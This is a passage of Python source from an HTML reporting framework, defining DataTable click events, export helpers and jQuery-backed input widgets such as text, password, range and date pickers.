# jsPost = self.aresObj.jsPost(saveRow['url'], None, saveRow.get('success', ''), htmlCodes=saveRow.get('htmlCodes')) if 'url' in saveRow else ''
# self.aresObj.jsOnLoadFnc.add('''
# $( document ).on('click', '.save_%(htmlId)s', function() {
# if ($(this).find('div').css('display') != 'none' ) {
# var jsTableId = window[$(this).find('div').attr('name') + '_table'];
# var data = {row: JSON.stringify(jsTableId.rows( $(this) ).data()[0]), row_id: jsTableId.row( $(this) ).index(), event: 'save' } ;
# %(jsPost)s; $(this).find('div').css('display', 'none'); } }) ''' % {"deleteCls": pyCssCls, 'jsPost': jsPost, 'htmlId': self.htmlId})
# return self
def setHeader(self, extraHeaders=None, cssClsStyles=None, cssClsHeader=None):
"""
:category: Table Definition
:rubric: HTML
:type: Style
:dsc:
Add an extra layer on top of the header
:example:
tb.setHeader([
[{'value': 'a', 'cols': 3, 'rows': 2}, {'value': 'b', 'cols': 3, 'rows': 1}],
[{'value': 'd', 'cols': 3, 'rows': 1}]])
:return: The Python Datatable object
"""
headers = []
if extraHeaders is not None:
for i, h in enumerate(extraHeaders):
tr = '<tr>'
if cssClsStyles is not None:
if isinstance(cssClsStyles, list):
if cssClsStyles[i] is not None:
tr = '<tr class="%s">' % cssClsStyles[i]
else:
tr = '<tr class="%s">' % cssClsStyles
headers.append("%s%s</tr>" % (tr, "".join(["<th colspan='%s' title='%s' rowspan='%s'>%s</th>" % (v.get('cols', 1), v.get('title', ''), v.get('rows', 1), v['value']) for v in h])))
if cssClsHeader is not None and self.aresObj.cssObj.get(cssClsHeader) is not None:
self.addPyCss(cssClsHeader)
headers.append("<tr class='%s'>%s</tr>" % (self.aresObj.cssObj.get(cssClsHeader)().classname, "".join(["<th>%s</th>" % h['title'] for h in self.__table.header])))
else:
headers.append("<tr>%s</tr>" % "".join(["<th class='%s'>%s</th>" % (h['title'], h.get('class')) for h in self.__table.header]))
self.header = "<thead>%(headers)s</thead>" % {'headers': "".join(headers)}
return self
def setFooter(self, row):
"""
:category: Table Definition
:rubric: HTML
:type: Style
:dsc:
Add a footer to the table
:example:
tb.setFooter(['', '', 0, 1, 2, 3, 4])
:return: The Python Datatable object
"""
titles = ['<th>%s</th>' % (h['value'] if isinstance(h, dict) else h) for h in row]
self.footer = '<tfoot><tr>%(columns)s</tr></tfoot>' % {'columns': "".join(titles)}
return self
def setTableCss(self, cssClss):
"""
:category: Table Definition
:rubric: CSS
:type: Style
:dsc:
Add a style to the datatable. This can be used to change some specific part of the table (for example the header)
:example:
class CssTableHeader(object):
__style = [{'attr': 'background', 'value': 'grey'}]
childrenTag = 'th'
tb.setTableCss(CssTableHeader)
:return: The Python Datatable object
"""
import inspect
if not isinstance(cssClss, list):
cssClss = [cssClss]
for cssCls in cssClss:
if inspect.isclass(cssCls):
self.aresObj.cssObj.addPy(cssCls)
cssCls = cssCls.__name__
clssMod = self.aresObj.cssObj.get(cssCls)
if clssMod is not None:
self.addPyCss(cssCls)
self.tableStyle.append(clssMod().classname)
return self
# -----------------------------------------------------------------------------------------
# JAVASCRIPT CLICK EVENTS
# -----------------------------------------------------------------------------------------
# TODO finalise event on col and Row
# TODO Add the global filtering aspect
# TODO Add the possibility to add or remove columns on demand
def jsClickState(self, htmlId=None):
"""
:category: Javascript Event
:rubric: JS
:example: myObj.jsClickState()
:dsc:
Python function to return the javascript state of a table (the selected information)
:return: Javascript list with the selected data
"""
if htmlId is None:
return "DATATABLES_STATE['#%(htmlId)s']" % {'htmlId': self.htmlId}
return "DATATABLES_STATE"
def clickRow(self, jsFncs, rowIndices=None, pyCssCls='CssTableSelected'):
"""
:category: Javascript Event
:rubric: JS
:type: Table Event
:example: >>> tableObj.clickRow( aresObj.jsConsole() )
:dsc:
Add a click event on the table rows. This is a wrapper on top of clickCell applied to the full row
:return: The Python table object
"""
self.cssSelection(pyCssCls)
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
self.clickCell(jsFncs, rowIndices=rowIndices)
return self
# self.aresObj.jsOnLoadFnc.add('''
# $('#%(htmlId)s').css( 'cursor', 'pointer') ;
# $('#%(htmlId)s').on('click', '%(eventSrc)s', function () {
# var loading = $("<div style='position:fixed;background:white;padding:5px;z-index:10;bottom:20px;left:60px;color:black' id='cell_loading'><i class='fas fa-spinner fa-spin'></i> Loading...</div>" ) ;
# $(this).append(loading) ; var useAsync = false ;
# if ( DATATABLES_STATE['#%(htmlId)s'] != undefined ) {
# DATATABLES_STATE['#%(htmlId)s'].forEach( function (rec) {
# $(%(jsTableId)s.row(rec.row_id).node()).removeClass( '%(pyCss)s' );
# $( %(jsTableId)s.row(rec.row_id).node()).find('td').each (function() {
# $(this).css( {"background-color": $(this).data("background") } ) ; }) ;
# } ) } ;
# DATATABLES_STATE['#%(htmlId)s'] = [] ;
# var data = {row: JSON.stringify(%(jsTableId)s.rows( $(this) ).data()[0]), row_id: %(jsTableId)s.row( $(this) ).index() } ;
# DATATABLES_STATE['#%(htmlId)s'].push( data );
#
# $( %(jsTableId)s.row(data.row_id).node()).find('td').each (function() {
# $(this).data("background", $(this).css("background-color") ) ;
# $(this).css( {"background-color": ""} ) ;
# }) ;
#
# $( %(jsTableId)s.row(data.row_id).node() ).addClass( '%(pyCss)s' );
# %(jsFncs)s ; %(jsTableId)s.draw('page') ;
# if (!useAsync) { loading.hide() ; }} );
# ''' % {'htmlId': self.htmlId, 'jsTableId': self.jsTableId, 'jsFncs': ";".join(jsFncs), 'eventSrc': eventSrc, 'pyCss': pyCss} )
def clickCol(self, jsFncs, colIndices=None, colNames=None):
"""
:category: Javascript Event
:rubric: JS
:type: Table Event
:example: tableObj.clickCol( aresObj.jsConsole() )
:example: tableObj.clickCol( aresObj.jsConsole(), ['col1'] )
:dsc:
Function to add a click event on columns. If the variable colNames is not defined with a list of columns
the framework will assume that the event should be applied on all the columns of the table
:Tip: You can get the selected column by using the function jsClickState in a javascript Event function
:return: The Python table object
"""
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
if colNames is not None:
  if not isinstance(colNames, list):
    colNames = [colNames]
  colIds = [self.columns.index(colName) for colName in colNames]
  if colIndices is not None:
    colIndices += colIds
  else:
    colIndices = colIds
self.clickCell(jsFncs, colIndices=colIndices)
return self
def clickCell(self, jsFncs, rowIndices=None, colIndices=None, colorSelected=True, pyCssCls='CssTableSelected'):
"""
:category: Javascript Event
:rubric: JS
:type: Table Event
:example: >>> t2.clickCell( aresObj.jsPost("BarChartData.py", jsFnc=barChart.jsGenerate() ) )
:dsc:
Function to add a click event on each cell in the table. It is possible to limit it to some columns and rows by using the
variables rowIndices and colIndices
:link Datatable Documentation: https://datatables.net/forums/discussion/46445/get-column-name-by-index
:return: The Javascript Fragment to enable the click on the table cells
"""
if colIndices is not None and not isinstance(colIndices, list):
colIndices = [colIndices]
if rowIndices is not None and not isinstance(rowIndices, list):
rowIndices = [rowIndices]
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
pyCss = self.cssSelection(pyCssCls)
pyCssSystemCls = self.getPyCss('CssTableColumnSystem')
self.aresObj.jsOnLoadFnc.add('''
$('#%(htmlId)s').css('cursor', 'pointer');
$('#%(htmlId)s').on('click', 'td:not(.%(pyCssDeleteCls)s)', function () {
var isValid = true;
if((%(rowIndex)s != null) && ( %(rowIndex)s.indexOf(%(jsTableId)s.cell($(this)).index().row)) < 0) {isValid = false};
if((%(colIndex)s != null) && ( %(colIndex)s.indexOf(%(jsTableId)s.cell($(this)).index().column)) < 0) {isValid = false};
if (isValid) {
var loading = $("<div style='position:fixed;background:white;padding:5px;z-index:10;bottom:20px;left:60px;color:black' id='cell_loading'><i class='fas fa-spinner fa-spin'></i> Loading...</div>" ) ;
$(this).append(loading); var useAsync = false;
if (DATATABLES_STATE['#%(htmlId)s'] != undefined) {
DATATABLES_STATE['#%(htmlId)s'].forEach(function (rec) {
$(%(jsTableId)s.cell(rec.row_id, rec.col_id).node()).removeClass('%(pyCss)s')})};
var data = {cell: %(jsTableId)s.cell($(this)).data(), row: JSON.stringify(%(jsTableId)s.rows($(this)).data()[0]),
row_id: %(jsTableId)s.cell($(this)).index().row, col_id: %(jsTableId)s.cell($(this)).index().column,
col_name: %(jsTableId)s.settings().init().columns[%(jsTableId)s.cell($(this)).index().column].title};
DATATABLES_STATE['#%(htmlId)s'] = [data];
if (%(colorSelected)s) {$(%(jsTableId)s.cell(data.row_id, data.col_id).node()).addClass('%(pyCss)s')}
%(jsFncs)s; %(jsTableId)s.draw('page');
if (!useAsync) {loading.hide()}}
});
''' % {'pyCssDeleteCls': pyCssSystemCls, 'htmlId': self.htmlId, 'jsTableId': self.jsTableId, 'jsFncs': ";".join(jsFncs),
'rowIndex': json.dumps(rowIndices), 'colIndex': json.dumps(colIndices), 'colorSelected': json.dumps(colorSelected), 'pyCss': pyCss})
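# Usage sketch (script name is an assumption): restrict the click event to the
# first two columns and reuse the generated data object in a server call.
#   tableObj.clickCell(aresObj.jsPost("CellDetails.py"), colIndices=[0, 1])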
# -----------------------------------------------------------------------------------------
# TABLE EXPORT OPTIONS
# -----------------------------------------------------------------------------------------
def __str__(self):
# # self.addGlobalFnc("GetTableData(tableObj)", '''
# # result = [] ;
# # var data = tableObj.rows().data() ;
# # for(var i = 0; i < data.data().length ; i++) { result.push(data[i]) ; }; return result; ''',
# # 'Function to get in an Array the content of a Datatable')
# # options = []
# # if self.addCol is not None:
# # plus = self.aresObj.plus()
# # row = []
# # for code, htmlObj in self.addCol.get('htmlObj', {}).items():
# # row.append( '"%s": %s' % (code, htmlObj.val))
# # for code, vals in self.addCol.get('default', {}).items():
# # row.append( '"%s": %s' % (code, json.dumps(vals) ))
# # row.append( 'last_mod_dt : Today()')
# # self.addGlobalVar('%s_default_row' % self.jsTableId, '[ {%s} ]' % ','.join(row) )
# # plus.click( self.jsAddRow( jsData="window['%s_default_row']" % self.jsTableId, uniqKey=self.addCol.get('uniqKey') ) )
# # options.append(plus.html())
# # if self.calculator:
# # options.append(self.aresObj.calculator(self.jqId).html())
# # if self.refresh:
# # if self.dataSrc is not None and self.dataSrc['type'] == 'script':
# # r = self.aresObj.refresh()
# # r.click(self.jsLoadFromSrc(self.dataSrc.get('jsDataKey')))
# # options.append(r.html())
# # if self.comment:
# # t = self.aresObj.thumbtack(self.jqId)
# # options.append(t.html())
# # if self.download:
# # copy = self.aresObj.upButton()
# # copy.click("%s.buttons('.buttons-copy').trigger();" % self.jsTableId)
# # options.append(copy.html())
# # if self.pdf:
# # pdf = self.aresObj.pdf()
# # pdf.click(["%s.buttons('.buttons-pdf').trigger();" % self.jsTableId])
# # options.append(pdf.html())
# # if self.excel:
# # excel = self.aresObj.excel()
# # excel.click("%s.buttons('.buttons-excel').trigger();" % self.jsTableId)
# # options.append(excel.html())
# # if self.magnify:
# # zoom = self.aresObj.zoom()
# # zoom.click( '''
# # if ( $('#%(htmlId)s').css('position') != 'fixed' ) {
# # $('#%(htmlId)s').css( {'position': 'fixed', 'top': 0, 'left':0, 'background-color': 'white', 'height': '100%%', 'width': '100%%', 'z-index': 1300} );
# # } else {
# # $('#%(htmlId)s').css( {'position': 'relative' , 'z-index': 1} ); }
# # %(jsTableId)s.draw() ;
# # ''' % { 'htmlId': self.htmlId, 'jsTableId': self.jsTableId } )
# # options.append(zoom.html())
# # #remove = self.aresObj.remove()
# # #remove.click([self.jsRemove()])
# # #options.append(remove.html())
return '''
<div %(strAttr)s><table class='%(tableCss)s'>%(header)s%(footer)s</table></div>
''' % {'strAttr': self.strAttr(pyClassNames=['CssDivWithBorder']), 'header': self.header, 'footer': self.footer, 'tableCss': " ".join(self.tableStyle)}
# return '''
# <div id="%(htmlId)s_loading" style="display:none;height:%(height)s" %(loading)s>
# <div style="margin:auto;font-size:20px;width:40%%">
# <div style="width:100%%;text-align:right;padding:5px 10px 0 0">
# <i class="fas fa-times-circle" onclick="$('#%(htmlId)s_loading').hide(); $('#%(htmlId)s').show()"></i>
# </div>
# <p>Loading...</p>
# <i id="%(htmlId)s_loading_icon" class="fas fa-spinner fa-spin"></i><br />
# </div>
# </div>
#
# <div %(strAttr)s>
# <div style="height:25px;width:100%%">
# <div style="height:25px;clear:left;float:left;margin-bottom:8px;font-size:16px;font-weight:bold;font-variant:small-caps;">%(title)s</div>
# <div style="height:25px;clear:right;float:right;color:#F5F5F5;text-align:right;align:right">%(options)s</div>
# </div>
# <div style="overflow:auto;width:100%%;height:100%%;">
# %(comments)s
# <table name='aresTable' class='%(tableStyle)s' style="width:%(tableWidth)s">%(header)s%(footer)s</table>
# </div>
# <div style='width:100%%;text-align:right;height:20px'>%(wrench)s<p id='%(htmlId)s_processing' style="margin-top:3px;font-size:12px;float:left;display:block;color:%(color)s"></p> %(clock)s<p id='%(htmlId)s_updated' style="margin-top:3px;font-size:12px;float:right;display:block;color:%(color)s">%(timestamp)s</p></div>
# </div>''' % {'strAttr': self.strAttr(pyClassNames=['CssDivWithBorder']), 'title': self.title, 'options': "".join(reversed(options)),
# 'clock': self.aresObj.clock(''), 'color': self.getColor('border', 1), 'timestamp': time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime()),
# 'footer': ''.join(footer), 'header': ''.join(self.htmlHeader()), 'tableStyle': self.tableStyle,
# 'wrench': self.aresObj.wrench('left'), 'htmlId': self.htmlId, "width": self.width, "tableWidth": self.tableWidth,
# 'loading': self.aresObj.cssObj.getClsTag(['CssDivLoading']),
# 'height': self.height, 'comments': self.dsc_comment}
def to_word(self, document):
"""
:category: Word export
:rubric: Output
:example: aresObj.to_word()
:dsc:
Special output function used by the framework to export the report to a word document.
This function cannot be used directly as it will write the report on the server, but some buttons are available on the top to trigger it
:link docx Documentation: http://python-docx.readthedocs.io/en/latest/
"""
data = self.data.records()
table = document.add_table(rows=1, cols=len(self.__table.header))
hdr_cells = table.rows[0].cells
for i, header in enumerate(self.__table.header):
hdr_cells[i].text = header['title']
if len(self.__table.header) < 10 and len(data) < 20:
for rec in data:
row_cells = table.add_row().cells
for i, header in enumerate(self.__table.header):
row_cells[i].text = str(rec[header['data']])
def to_xls(self, workbook, worksheet, cursor):
"""
:category: Excel export
:rubric: Output
:example: aresObj.to_xls()
:dsc:
Special output function used by the framework to export the report to an Excel document.
This function cannot be used directly as it will write the report on the server, but some buttons are available on the top to trigger it
"""
if self.title != '':
cell_format = workbook.add_format({'bold': True, 'align': 'center'})
worksheet.merge_range(cursor['row'], cursor['col'], cursor['row'], cursor['col']+len(self.__table.header)-1, self.title, cell_format)
cursor['row'] += 1
for i, header in enumerate(self.__table.header):
worksheet.write(cursor['row'], i, header['title'])
cursor['row'] += 1
for rec in self.data.records():
for i, header in enumerate(self.__table.header):
worksheet.write(cursor['row'], i, rec[header['data']])
cursor['row'] += 1
cursor['row'] += 1
# -----------------------------------------------------------------------------------------
# MARKDOWN SECTION
# -----------------------------------------------------------------------------------------
@classmethod
def matchMarkDownBlock(cls, data): return True if data[0].strip().startswith( "---Table" ) else None
@staticmethod
def matchEndBlock(data): return data.endswith("---")
@classmethod
def convertMarkDownBlock(cls, data, aresObj=None):
"""
:category: Markdown
:rubric: PY
:example: Data structure recognised
---Table
label|value|color
Test 1|35|yellow
Test 2|25|blue
---
:dsc:
Convert the markdown text to a valid aresObj item.
In order to include it in a report it is necessary to pass the aresObj
"""
tableConfig = data[0].split(':')
tableType = tableConfig[-1] if len(tableConfig) > 1 else 'base'
headers = data[1].strip().split("|")
records, pmts, attr = [], {}, {}
for line in data[2:-1]:
rec = {}
if line.startswith("@"):
dataAttr = line[1:].strip().split(";")
for d in dataAttr:
a, b = d.split(":")
attr[a] = b
continue
if line.startswith("--"):
dataAttr = line[2:].strip().split(";")
for d in dataAttr:
a, b = d.split(":")
pmts[a] = b
continue
splitLine = line.replace(",", '.').strip().split("|")
for i, val in enumerate(splitLine):
  rec[headers[i]] = val
records.append(rec)
if aresObj is not None:
if 'pageLength' in pmts:
pmts['pageLength'] = int(pmts['pageLength'])
p = aresObj.table(records, header=headers, rows=headers, cols=[], tableTypes=tableType, tableOptions=pmts)
p.addAttr(attr, isPyData=False)
return []
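# Markdown sketch recognised by this parser; the '--' line feeds the tableOptions
# dictionary (pageLength is cast to int above) and '@' lines feed addAttr:
#   ---Table:base
#   label|value
#   --pageLength:10
#   Test 1|35
#   Test 2|25
#   ---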
def jsMarkDown(self): return ""
class DataExcel(AresHtml.Html):
"""
:category: Excel Data Table
:rubric: JS
:dsc:
"""
name, category, callFnc, docCategory = 'Excel', 'Excel', 'excel', 'Standard'
cssTitle = "CssTitle4"
__pyStyle = ['CssTableExcel', 'CssTableExcelHeaderCell', 'CssTableExcelTd']
def __init__(self, aresObj, recordSet, cols, rows, title, width, widthUnit, height, heightUnit, cellwidth, delimiter, htmlCode):
self.title, self.recordSet, self.delimiter = title, recordSet, delimiter
super(DataExcel, self).__init__(aresObj, [], code=htmlCode, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit)
self._jsStyles = {'header': rows + cols, 'cellwidth': cellwidth}
self.css({'display': 'inline-block', 'overflow': 'auto', 'padding': 0, 'vertical-align': 'top'})
@property
def val(self):
return "JSON.stringify(tableData(%s))" % self.jqId
@property
def records(self):
return "listToRec(tableData(%s), %s)" % (self.jqId, json.dumps(self._jsStyles['header']))
@property
def jqId(self):
""" Refer to the internal select item """
return "$('#%s table')" % self.htmlId
def onDocumentLoadFnc(self):
self.addGlobalFnc("%s(htmlObj, data, jsStyles)" % self.__class__.__name__, ''' htmlObj.empty();
var tr = $('<tr></tr>');
jsStyles.header.forEach(function(rec){tr.append("<th>"+ rec +"</th>")});
htmlObj.append(tr); var tr = $('<tr></tr>'); var tbody = $('<tbody></tbody>');
jsStyles.header.forEach(function(rec){tr.append("<td><input type='text' style='"+ jsStyles.cellwidth +"'/></td>")});
tbody.append(tr);htmlObj.append(tbody)''')
def __str__(self):
self.aresObj.jsOnLoadFnc.add('''
function tableData(tableObj){
res = [];
tableObj.find('tbody').find('tr').each(function(key, val){
var row = [];
$(this).find('td').each(function(key, cell) { row.push($(cell).find('input').val())});
res.push(row)}); return res};
function listToRec(data, header){
var res = [];
data.forEach(function(row){
rec = {};
header.forEach(function(h, i){rec[h] = row[i];});
res.push(rec);
}); return res}''')
self.paste('''
var tbody = $(this).find('tbody'); tbody.empty();
var tableId = $(this).parent().attr('id');
var lineDelimiter = $('#' + tableId + '_delimiter').val();
if (lineDelimiter == 'TAB'){ lineDelimiter = '\\t' };
data.split("\\n").forEach(function(line){
if (line !== ''){
var tr = $('<tr></tr>');
line.split(lineDelimiter).forEach(function(rec){ tr.append("<td><input type='text' value='"+ rec +"'/></td>")
}); tbody.append(tr)}}) ''')
title = ''
if self.title != '':
cssMod, titleCls = self.aresObj.cssObj.get(self.cssTitle), ""
if cssMod is not None:
self.addPyCss(self.cssTitle)
titleCls = cssMod().classname
title = '<div class="%(titleCls)s" style="margin:0;display:inline-block;margin-bottom:5px">%(title)s</div>' % {'titleCls': titleCls, 'title': self.title}
if self.delimiter is None:
delimiter = '<input id="%s_delimiter" type="text" value="" placeholder="Line delimiter"/>' % self.htmlId
else:
delimiter = '<input id="%s_delimiter" type="text" value="%s" style="display:none" placeholder="Line delimiter"/>' % (self.htmlId, self.delimiter)
return '<div %(strAttr)s>%(title)s%(delimiter)s<table></table></div>' % {'strAttr': self.strAttr(pyClassNames=self.pyStyle), 'title': title, 'delimiter': delimiter}
```
#### File: Lib/html/AresHtmlInput.py
```python
DSC = {
'eng':
'''
:dsc:
'''}
import json
import datetime
from ares.Lib.html import AresHtml
class InputText(AresHtml.Html):
""" Python wrapper for the Html input text element
"""
references = {'Input Tutorial': 'https://openclassrooms.com/courses/decouvrez-la-puissance-de-jquery-ui/l-autocompletion-1'}
__pyStyle = ['CssDivNoBorder']
__reqCss, __reqJs = ['bootstrap', 'font-awesome', 'jqueryui'], ['bootstrap', 'font-awesome', 'jquery']
name, category, inputType, callFnc, docCategory = 'Input Text', 'Input', "text", 'input', 'Advanced'
def __init__(self, aresObj, text, placeholder, label, icon, width, widthUnit, height, heightUnit, color, size, align, htmlCode,
withRemoveButton, autocompleteSrc, tooltip, docBlock, lettersOnly, globalFilter):
self.autocompleteSrc, self.align, self.label, self.withRemoveButton = autocompleteSrc, align, label, withRemoveButton
self.placeholder, self._disabled, self.icon = placeholder, '', icon
super(InputText, self).__init__(aresObj, text, htmlCode=htmlCode, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit, docBlock=docBlock, globalFilter=globalFilter)
self.color = self.getColor('textColor', 1) if color is None else color
self.size = self.aresObj.pyStyleDfl['fontSize'] if size is None else "%spx" % size
self.css({'clear': 'both', "vertical-align": "middle"})
if self.htmlCode is not None:
self.aresObj.htmlCodes[self.htmlCode] = self
self.change('') # Add the onchange method to update the breadcrumb
if self.htmlCode in self.aresObj.http:
self.vals = self.aresObj.http[self.htmlCode]
if tooltip != '':
self.tooltip(tooltip)
if lettersOnly:
self.keydown("returnVal = ( (event.keyCode >= 65 && event.keyCode <= 90) || event.keyCode == 8 || event.key == '_');")
def autocomplete(self, dataSrc):
if isinstance( dataSrc, list):
dataSrc = {"type": 'static', 'minLength': 1, 'data': dataSrc}
self.autocompleteSrc = dataSrc
return self
def emtpy(self): return '$("#%s input").val("")' % self.htmlId
@property
def val(self): return '$("#%s input").val()' % self.htmlId
@property
def disabled(self):
self._disabled = 'disabled'
return self
@property
def jsQueryData(self): return "{ event_val: $(this).find('input').val() }"
def onDocumentLoadFnc(self): self.addGlobalFnc("%s(htmlObj, data)" % self.__class__.__name__, "htmlObj.find('input').val(data);", 'Javascript Object builder')
def enter(self, jsFncs):
"""
:category: Javascript Event
:rubric: JS
:example: >>> myObj.input(placeholder="Put your tag").enter( " alert() " )
:dsc:
Add a javascript action when the enter key is pressed on the keyboard
:return: The python object itself
"""
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
self.jsFrg("keydown", "if (event.keyCode == 13) { var data = %(data)s; event.preventDefault(); %(jsFnc)s } " % {"jsFnc": ";".join(jsFncs), 'data': self.jsQueryData})
return self
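# Usage sketch (hedged): log the input content when Enter is pressed; jsConsole
# follows the examples used elsewhere in this document.
#   inp = aresObj.input(placeholder="Type and press enter")
#   inp.enter(aresObj.jsConsole(inp.val))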
def filter(self, aresDf, colName, caseSensitive=False, multiVals=False, exactMath=False, allSelected=True, filterGrp=None):
"""
:category: Javascript Features - Filter Input
:rubric: JS
:type: Front End
:example: htmlObj.filter(data, 'Country')
:dsc:
Wrapper to filter data on the exact content
"""
if caseSensitive:
srcObj = "aresObj('%s').split(', ')" % self.htmlCode if multiVals else "aresObj('%s')" % self.htmlCode
recObj = "rec['%s']" % colName
else:
srcObj = "aresObj('%s').split(', ').toLowerCase()" % self.htmlCode if multiVals else "aresObj('%s').toLowerCase()" % self.htmlCode
recObj = "rec['%s'].toLowerCase()" % colName
if exactMath:
if multiVals:
strFilter = ["( %s.indexOf(%s) >= 0 ) " % (srcObj, recObj)]
else:
strFilter = ["( %s == %s )" % (srcObj, recObj)]
else:
if multiVals:
strFilter = ["( %s.indexOf(%s) >= 0 ) " % (srcObj, recObj)]
else:
strFilter = ["( %s.indexOf(%s) >= 0 ) " % (recObj, srcObj)]
if allSelected:
strFilter.append("( aresObj('%s') == '')" % self.htmlCode)
if multiVals:
aresDf.link("change", self.htmlCode, " || ".join(strFilter), filterGrp if filterGrp is not None else "filter_%s" % aresDf.htmlCode, colNames=[colName])
aresDf.link("input", self.htmlCode, " || ".join(strFilter), filterGrp if filterGrp is not None else "filter_%s" % aresDf.htmlCode, colNames=[colName])
return self
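# Usage sketch (assumes an aresDf-like data source `df` registered with an
# htmlCode, per the link() calls above): keep rows whose 'Country' contains the
# typed text, and everything when the input is empty.
#   inp.filter(df, 'Country', caseSensitive=False, allSelected=True)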
def __str__(self):
""" Return the String representation of a HTML Input object """
htmlData, textIndent = [], 0
if self.autocompleteSrc is not None:
if self.autocompleteSrc['type'] == 'static':
if self.autocompleteSrc.get('multiple', False):
src = {'source': 'function( request, response ) { response( $.ui.autocomplete.filter( %s, request.term.split( /,\s*/ ).pop() ) ) }' % self.autocompleteSrc['data'],
'minLength': self.autocompleteSrc.get('minLength', 3), 'focus': 'function() { return false ; }',
'select': 'function(event, ui){ var terms = this.value.split( /,\s*/ ); terms.pop(); terms.push( ui.item.value ); terms.push( "" );this.value = terms.join( ", " ); %s; return false; }' % self.autocompleteSrc.get('success', '')}
else:
src = { 'source': json.dumps(self.autocompleteSrc['data']), 'minLength': self.autocompleteSrc.get('minLength', 3),
'select': 'function(event, ui){ %s; }' % self.autocompleteSrc.get('success', '') }
src = "{ %s }" % ",".join(["%s: %s" % (key, val) for key, val in src.items()])
self.aresObj.jsOnLoadFnc.add("$('#%(htmlId)s input').autocomplete( %(dataSrc)s )" % {'htmlId': self.htmlId, 'dataSrc': src })
self.addGlobalFnc('RemoveFilter(htmlId)', "$('#' + htmlId + ' input').val(''); $('#' + htmlId + ' input').change() ;", 'Javascript function to remove the content of an element and trigger a change event')
if self.label:
htmlData.append('''<label style='height:25px;color:%s;font-size:%s;margin-bottom:-10px;padding-bottom:0px;'>%s</label>''' % (self.color, self.size, self.label))
htmlData.append('<div %(strAttr)s><div style="height:100%%;width:100%%;">' % {'strAttr': self.strAttr(pyClassNames=['CssDivNoBorder'])})
if self.icon:
htmlData.append('<span class="%s" style="position:absolute;font-size:15px;left:7px;top:5px;"></span>' % self.icon)
textIndent = 30
htmlData.append('<input type="%(inputType)s" %(disabled)s placeholder="%(placeholder)s" class="form-control" value="%(vals)s" style="text-indent:%(textIndent)spx;height:27px;width:100%%"/>' % {'inputType': self.inputType, 'disabled': self._disabled, 'placeholder': self.placeholder, 'textIndent': textIndent, 'vals': self.vals})
htmlData.append('</div>')
if self.withRemoveButton:
htmlData.append('''<div onclick="RemoveFilter('%(htmlId)s')" style="margin-top:-27px;z-index:1;float:right;width:25px;height:100%%;padding:5px;cursor:pointer;position:relative;color:%(darkRed)s" title="Remove filter" class="fas fa-user-times"> </div>''' % {'htmlId': self.htmlId, 'darkRed': self.getColor('redColor', 4)})
htmlData.append('</div>')
return ''.join(htmlData)
def to_word(self, document):
p = document.add_paragraph()
p.add_run("Input: ")
runner = p.add_run( self.aresObj.http.get(self.htmlCode, self.vals) )
runner.bold = True
def to_xls(self, workbook, worksheet, cursor):
"""
:param workbook:
:param worksheet:
:param cursor:
:return:
:link xlxWritter Documentation: https://xlsxwriter.readthedocs.io/format.html
"""
cell_format = workbook.add_format({'bold': True, 'font_color': self.color, 'font_size': self.size})
worksheet.write(cursor['row'], 0, self.vals, cell_format)
cursor['row'] += 2
class InputPass(InputText):
""" Python rapper for the Html input password element """
references = {'Input Password': 'https://developer.mozilla.org/fr/docs/Web/HTML/Element/Input/password',
'Input Password W3C': 'https://www.w3schools.com/howto/howto_js_password_validation.asp',
'Input Password Event': 'https://www.w3schools.com/howto/howto_js_toggle_password.asp'}
inputType = "password"
name, category, callFnc, docCategory = 'Input Password', 'Input', 'pwd', 'Advanced'
class InputInt(InputText):
""" Python wrapper for the Html input integer element """
references = {'Input Forms': 'https://www.alsacreations.com/tuto/lire/1409-formulaire-html5-type-number.html'}
inputType = "number"
__pyStyle = ['CssInput', 'CssInputInt', 'CssInputLabel']
name, category, callFnc, docCategory = 'Input Integer', 'Input', 'inputInt', 'Advanced'
class InputRange(AresHtml.Html):
""" Python wrapper for the HTML input range element
:example: aresObj.inputRange('Coucou', number=11)
"""
references = {'Input Range': 'https://www.alsacreations.com/tuto/lire/1410-formulaire-html5-type-range.html'}
name, category, callFnc, docCategory = 'Input Range', 'Input', 'inputRange', 'Advanced'
__pyStyle = ['CssInput', 'CssInputText', 'CssInputLabel']
def __init__(self, aresObj, recordSet, color, size, align, width, widthUnit, height, heightUnit, htmlCode):
self.align = align
super(InputRange, self).__init__(aresObj, recordSet, htmlCode=htmlCode, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit)
if not 'step' in self.vals:
self.vals['step'] = 1
self.color = self.getColor('baseColor', 2) if color is None else color
self.size = self.aresObj.pyStyleDfl['fontSize'] if size is None else "%spx" % size
self.css( {"display": 'inline-block'})
if self.htmlCode is not None:
self.aresObj.htmlCodes[self.htmlCode] = self
self.change('')
@property
def val(self): return '$("#%s input").val()' % self.htmlId
@property
def data(self): return "{ event_val: $(this).find('input').val() }"
def change(self, jsFncs):
if isinstance(jsFncs, list):
for jsFnc in jsFncs:
self.jsFrg('change', jsFnc)
else:
self.jsFrg('change', jsFncs)
def onDocumentLoadFnc(self):
self.addGlobalFnc("%s(htmlObj, data)" % self.__class__.__name__, ''' htmlObj.empty() ;
if ( data.label != undefined) {htmlObj.append("<label for='" + data.label + "' style='display:inline-block;vertical-align:middle;text-align:%s;padding-left:6px;color:%s;font-size:%s;font-weight:bold;'>" + data.label + "</label>") } ;
htmlObj.append("<input oninput='range_weight_disp.value=this.value' min="+ data.min + " max="+ data.max + " step="+ data.step + " type='range' placeholder='" + data.placeholder + " ' value=" + data.text + ">");
htmlObj.append("<output id='range_weight_disp'></output>");
''' % (self.align, self.color, self.size), 'Javascript Object builder')
def __str__(self):
""" Return the String representation of a HTML Input object """
return '<div %s></div>' % self.strAttr(pyClassNames=self.__pyStyle)
class DatePicker(AresHtml.Html):
""" Python Wrapper for the Html and Jquery UI datepicker object
"""
references = {'Date Picker Jquery': 'https://jqueryui.com/datepicker/'}
__reqCss, __reqJs = ['bootstrap', 'font-awesome'], ['bootstrap', 'jquery', 'font-awesome']
name, category, callFnc, docCategory = 'Date Picker', 'Input', 'date', 'Advanced'
__pyStyle = ['CssDivNoBorder', 'CssDivCursor']
def __init__(self, aresObj, label, color, size, yyyy_mm_dd, htmlCode, frequency, placeholder, changeMonth,
